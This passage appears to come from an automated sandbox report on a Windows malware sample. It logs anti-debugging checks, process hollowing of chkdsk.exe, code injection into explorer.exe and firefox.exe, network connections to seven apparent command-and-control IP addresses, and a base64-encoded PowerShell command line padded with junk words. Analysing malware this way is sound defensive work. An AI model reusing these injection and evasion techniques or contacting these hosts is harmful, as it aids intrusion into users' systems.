Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB9D46 mov eax, dword ptr fs:[00000030h]	27_2_1EFB9D46
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB9D46 mov ecx, dword ptr fs:[00000030h]	27_2_1EFB9D46
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F053CD4 mov eax, dword ptr fs:[00000030h]	27_2_1F053CD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F053CD4 mov eax, dword ptr fs:[00000030h]	27_2_1F053CD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F053CD4 mov ecx, dword ptr fs:[00000030h]	27_2_1F053CD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F053CD4 mov eax, dword ptr fs:[00000030h]	27_2_1F053CD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F053CD4 mov eax, dword ptr fs:[00000030h]	27_2_1F053CD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F045CD0 mov eax, dword ptr fs:[00000030h]	27_2_1F045CD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBFD20 mov eax, dword ptr fs:[00000030h]	27_2_1EFBFD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F094CD2 mov eax, dword ptr fs:[00000030h]	27_2_1F094CD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAD20 mov ecx, dword ptr fs:[00000030h]	27_2_1EFEAD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAD20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F040CEE mov eax, dword ptr fs:[00000030h]	27_2_1F040CEE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F057CE8 mov eax, dword ptr fs:[00000030h]	27_2_1F057CE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFECD10 mov eax, dword ptr fs:[00000030h]	27_2_1EFECD10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFECD10 mov ecx, dword ptr fs:[00000030h]	27_2_1EFECD10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03CCF0 mov ecx, dword ptr fs:[00000030h]	27_2_1F03CCF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAD00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAD00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAD00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAD00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAD00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAD00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFE0D01 mov eax, dword ptr fs:[00000030h]	27_2_1EFE0D01
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD3AF6 mov eax, dword ptr fs:[00000030h]	27_2_1EFD3AF6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD3AF6 mov eax, dword ptr fs:[00000030h]	27_2_1EFD3AF6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD3AF6 mov eax, dword ptr fs:[00000030h]	27_2_1EFD3AF6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD3AF6 mov eax, dword ptr fs:[00000030h]	27_2_1EFD3AF6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD3AF6 mov eax, dword ptr fs:[00000030h]	27_2_1EFD3AF6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F001B0F mov eax, dword ptr fs:[00000030h]	27_2_1F001B0F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F001B0F mov eax, dword ptr fs:[00000030h]	27_2_1F001B0F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC0AED mov eax, dword ptr fs:[00000030h]	27_2_1EFC0AED
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC0AED mov eax, dword ptr fs:[00000030h]	27_2_1EFC0AED
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC0AED mov eax, dword ptr fs:[00000030h]	27_2_1EFC0AED
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFE0AEB mov eax, dword ptr fs:[00000030h]	27_2_1EFE0AEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFE0AEB mov eax, dword ptr fs:[00000030h]	27_2_1EFE0AEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFE0AEB mov eax, dword ptr fs:[00000030h]	27_2_1EFE0AEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBFAEC mov edi, dword ptr fs:[00000030h]	27_2_1EFBFAEC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC9AE4 mov eax, dword ptr fs:[00000030h]	27_2_1EFC9AE4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F04DB1B mov eax, dword ptr fs:[00000030h]	27_2_1F04DB1B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F04CB20 mov eax, dword ptr fs:[00000030h]	27_2_1F04CB20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F04CB20 mov eax, dword ptr fs:[00000030h]	27_2_1F04CB20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F04CB20 mov eax, dword ptr fs:[00000030h]	27_2_1F04CB20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F04DB2A mov eax, dword ptr fs:[00000030h]	27_2_1F04DB2A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD0ACE mov eax, dword ptr fs:[00000030h]	27_2_1EFD0ACE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD0ACE mov eax, dword ptr fs:[00000030h]	27_2_1EFD0ACE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDAC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDAC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDAC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDAC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDAC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDAC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF9ABF mov eax, dword ptr fs:[00000030h]	27_2_1EFF9ABF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF9ABF mov eax, dword ptr fs:[00000030h]	27_2_1EFF9ABF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF9ABF mov eax, dword ptr fs:[00000030h]	27_2_1EFF9ABF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F04FB45 mov eax, dword ptr fs:[00000030h]	27_2_1F04FB45
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07BB40 mov ecx, dword ptr fs:[00000030h]	27_2_1F07BB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07BB40 mov eax, dword ptr fs:[00000030h]	27_2_1F07BB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F094B67 mov eax, dword ptr fs:[00000030h]	27_2_1F094B67
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F076B77 mov eax, dword ptr fs:[00000030h]	27_2_1F076B77
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBBA80 mov eax, dword ptr fs:[00000030h]	27_2_1EFBBA80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F04DB90 mov eax, dword ptr fs:[00000030h]	27_2_1F04DB90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041B93 mov eax, dword ptr fs:[00000030h]	27_2_1F041B93
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F088BBE mov eax, dword ptr fs:[00000030h]	27_2_1F088BBE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F088BBE mov eax, dword ptr fs:[00000030h]	27_2_1F088BBE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F088BBE mov eax, dword ptr fs:[00000030h]	27_2_1F088BBE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F088BBE mov eax, dword ptr fs:[00000030h]	27_2_1F088BBE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF9A48 mov eax, dword ptr fs:[00000030h]	27_2_1EFF9A48
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF9A48 mov eax, dword ptr fs:[00000030h]	27_2_1EFF9A48
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEEA40 mov eax, dword ptr fs:[00000030h]	27_2_1EFEEA40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEEA40 mov eax, dword ptr fs:[00000030h]	27_2_1EFEEA40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBFA44 mov ecx, dword ptr fs:[00000030h]	27_2_1EFBFA44
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FBC2 mov eax, dword ptr fs:[00000030h]	27_2_1F03FBC2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F044BC0 mov eax, dword ptr fs:[00000030h]	27_2_1F044BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F044BC0 mov eax, dword ptr fs:[00000030h]	27_2_1F044BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F044BC0 mov eax, dword ptr fs:[00000030h]	27_2_1F044BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F044BC0 mov eax, dword ptr fs:[00000030h]	27_2_1F044BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB7A30 mov eax, dword ptr fs:[00000030h]	27_2_1EFB7A30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB7A30 mov eax, dword ptr fs:[00000030h]	27_2_1EFB7A30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB7A30 mov eax, dword ptr fs:[00000030h]	27_2_1EFB7A30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC1A24 mov eax, dword ptr fs:[00000030h]	27_2_1EFC1A24
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC1A24 mov eax, dword ptr fs:[00000030h]	27_2_1EFC1A24
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F066BDE mov ebx, dword ptr fs:[00000030h]	27_2_1F066BDE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F066BDE mov eax, dword ptr fs:[00000030h]	27_2_1F066BDE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDA20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDA20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDA20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDA20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDA20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDA20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDA20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDA20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDA20 mov eax, dword ptr fs:[00000030h]	27_2_1EFEDA20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEDA20 mov edx, dword ptr fs:[00000030h]	27_2_1EFEDA20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F094BE0 mov eax, dword ptr fs:[00000030h]	27_2_1F094BE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFAA0E mov eax, dword ptr fs:[00000030h]	27_2_1EFFAA0E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFAA0E mov eax, dword ptr fs:[00000030h]	27_2_1EFFAA0E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB7BF0 mov eax, dword ptr fs:[00000030h]	27_2_1EFB7BF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB7BF0 mov ecx, dword ptr fs:[00000030h]	27_2_1EFB7BF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB7BF0 mov eax, dword ptr fs:[00000030h]	27_2_1EFB7BF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB7BF0 mov eax, dword ptr fs:[00000030h]	27_2_1EFB7BF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1BE7 mov eax, dword ptr fs:[00000030h]	27_2_1EFD1BE7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1BE7 mov eax, dword ptr fs:[00000030h]	27_2_1EFD1BE7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF5BE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFF5BE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF5BE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFF5BE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFE8BD1 mov eax, dword ptr fs:[00000030h]	27_2_1EFE8BD1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFE8BD1 mov eax, dword ptr fs:[00000030h]	27_2_1EFE8BD1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F04DA31 mov eax, dword ptr fs:[00000030h]	27_2_1F04DA31
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07DA30 mov eax, dword ptr fs:[00000030h]	27_2_1F07DA30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBEBC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFBEBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEFBC0 mov ecx, dword ptr fs:[00000030h]	27_2_1EFEFBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEFBC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFEFBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEFBC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFEFBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEFBC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFEFBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEFBC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFEFBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFBBC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFFBBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFBBC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFFBBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFBBC0 mov ecx, dword ptr fs:[00000030h]	27_2_1EFFBBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFBBC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFFBBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F04DA40 mov eax, dword ptr fs:[00000030h]	27_2_1F04DA40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F05AA40 mov eax, dword ptr fs:[00000030h]	27_2_1F05AA40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F05AA40 mov eax, dword ptr fs:[00000030h]	27_2_1F05AA40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F044A57 mov eax, dword ptr fs:[00000030h]	27_2_1F044A57
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F044A57 mov eax, dword ptr fs:[00000030h]	27_2_1F044A57
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC3BA4 mov eax, dword ptr fs:[00000030h]	27_2_1EFC3BA4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC3BA4 mov eax, dword ptr fs:[00000030h]	27_2_1EFC3BA4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC3BA4 mov eax, dword ptr fs:[00000030h]	27_2_1EFC3BA4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC3BA4 mov eax, dword ptr fs:[00000030h]	27_2_1EFC3BA4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF1B9C mov eax, dword ptr fs:[00000030h]	27_2_1EFF1B9C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08BA66 mov eax, dword ptr fs:[00000030h]	27_2_1F08BA66
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08BA66 mov eax, dword ptr fs:[00000030h]	27_2_1F08BA66
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08BA66 mov eax, dword ptr fs:[00000030h]	27_2_1F08BA66
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08BA66 mov eax, dword ptr fs:[00000030h]	27_2_1F08BA66
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1B80 mov eax, dword ptr fs:[00000030h]	27_2_1EFD1B80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB7B7D mov eax, dword ptr fs:[00000030h]	27_2_1EFB7B7D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB7B7D mov ecx, dword ptr fs:[00000030h]	27_2_1EFB7B7D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF4B79 mov eax, dword ptr fs:[00000030h]	27_2_1EFF4B79
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F076A80 mov eax, dword ptr fs:[00000030h]	27_2_1F076A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]	27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h]	27_2_1EFC6B70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h]	27_2_1EFC6B70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h]	27_2_1EFC6B70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFBB5B mov esi, dword ptr fs:[00000030h]	27_2_1EFFBB5B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07DAAF mov eax, dword ptr fs:[00000030h]	27_2_1F07DAAF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F067ABE mov eax, dword ptr fs:[00000030h]	27_2_1F067ABE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFCB20 mov eax, dword ptr fs:[00000030h]	27_2_1EFFCB20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F094AE8 mov eax, dword ptr fs:[00000030h]	27_2_1F094AE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEEB1C mov eax, dword ptr fs:[00000030h]	27_2_1EFEEB1C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBCB1E mov eax, dword ptr fs:[00000030h]	27_2_1EFBCB1E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC8B10 mov eax, dword ptr fs:[00000030h]	27_2_1EFC8B10

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 27_2_1F002F00 NtCreateFile,LdrInitializeThunk,

27_2_1F002F00

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 68.65.122.211 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.18 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 209.99.40.222 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.192.29.215 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 180.76.247.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.171 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.23.49.173 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: BA0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\chkdsk.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF62D2D0000

Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL 